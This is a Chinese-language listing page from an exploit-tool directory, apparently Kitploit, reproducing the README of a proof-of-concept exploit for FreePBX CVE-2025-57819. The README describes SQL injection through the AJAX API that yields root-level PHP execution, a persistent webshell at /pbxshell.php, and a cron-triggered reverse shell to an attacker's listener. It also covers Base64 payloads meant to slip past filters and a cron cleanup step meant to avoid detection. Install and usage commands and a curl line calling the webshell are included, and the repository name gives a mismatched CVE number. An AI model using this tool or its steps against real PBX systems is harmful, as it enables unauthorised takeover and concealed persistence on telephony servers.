Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-5781 — 针对 FreePBX 中 CVE-2025-57819 的概念验证漏洞利用:通过 AJAX API 中的 SQL 注入执行任意 PHP 代码、创建持久化 WebShell,并触发反向 Shell。 | Kitploit
工具/GitHubGitHub/jasonbernier/cve-2025-5781
持久化机制漏洞利用Web应用程序漏洞利用后渗透利用命令与控制Payload 开发
GitHubjasonbernier/cve-2025-5781

CVE-2025-5781

针对 FreePBX 中 CVE-2025-57819 的概念验证漏洞利用:通过 AJAX API 中的 SQL 注入执行任意 PHP 代码、创建持久化 WebShell,并触发反向 Shell。

查看仓库
151个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

FreePBX CVE-2025-57819 漏洞利用工具

描述

该脚本利用了 FreePBX 16.0.26.0 之前版本中的一个漏洞(CVE-2025-57819),允许远程攻击者通过 AJAX API 端点中的 SQL 注入缺陷执行任意 PHP 代码。该脚本会同时创建 webshell 和自动触发的反向 shell。

漏洞详情

  • CVE:CVE-2025-57819
  • 受影响版本:FreePBX < 16.0.26.0
  • 影响:远程代码执行(RCE)
  • 攻击向量:AJAX API(/admin/ajax.php)中的 SQL 注入

功能特性

  • 在 /pbxshell.php 创建持久化 webshell
  • 通过 cron 任务设置自动触发的反向 shell
  • 使用 Base64 编码的 payload 绕过过滤器
  • 执行后自动清理 cron 任务

环境要求

  • Python 3.x
  • requests 库
  • Netcat(用于反向 shell 监听)

安装

git clone https://github.com/jasonbernier/CVE-2025-5781.git
cd CVE-2025-5781
pip install requests

使用方法

python3 exploit.py -H TARGET_HOST -lhost LHOST -lport LPORT

参数:

  • -H HOST:目标 FreePBX 实例(例如 https://freepbx.example.com)
  • -lhost LHOST:用于反向 shell 回连的 IP 地址
  • -lport LPORT:反向 shell 连接的端口

示例:

python3 exploit.py -H https://target.freepbx.com -lhost 10.0.0.1 -lport 4444

利用流程

  1. 发送 SQL 注入 payload 以创建 webshell
  2. 等待 webshell 创建完成(约 2 分钟)
  3. 通过 cron 任务创建自动触发的反向 shell
  4. 在指定端口启动 netcat 监听

Webshell 用法

利用成功后,通过以下方式访问 webshell:

curl -X GET "http://TARGET/pbxshell.php?cmd=id"

清理

该脚本会在执行后自动删除 cron 任务以避免被检测。

注意事项

  • 脚本使用 -- 注释掉剩余的 SQL 语法
  • 所有命令均以 root 权限执行
  • 需要对 /var/www/html/ 目录具有写入权限

参考资料

  • CVE-2025-57819
  • FreePBX 安全公告
下载工具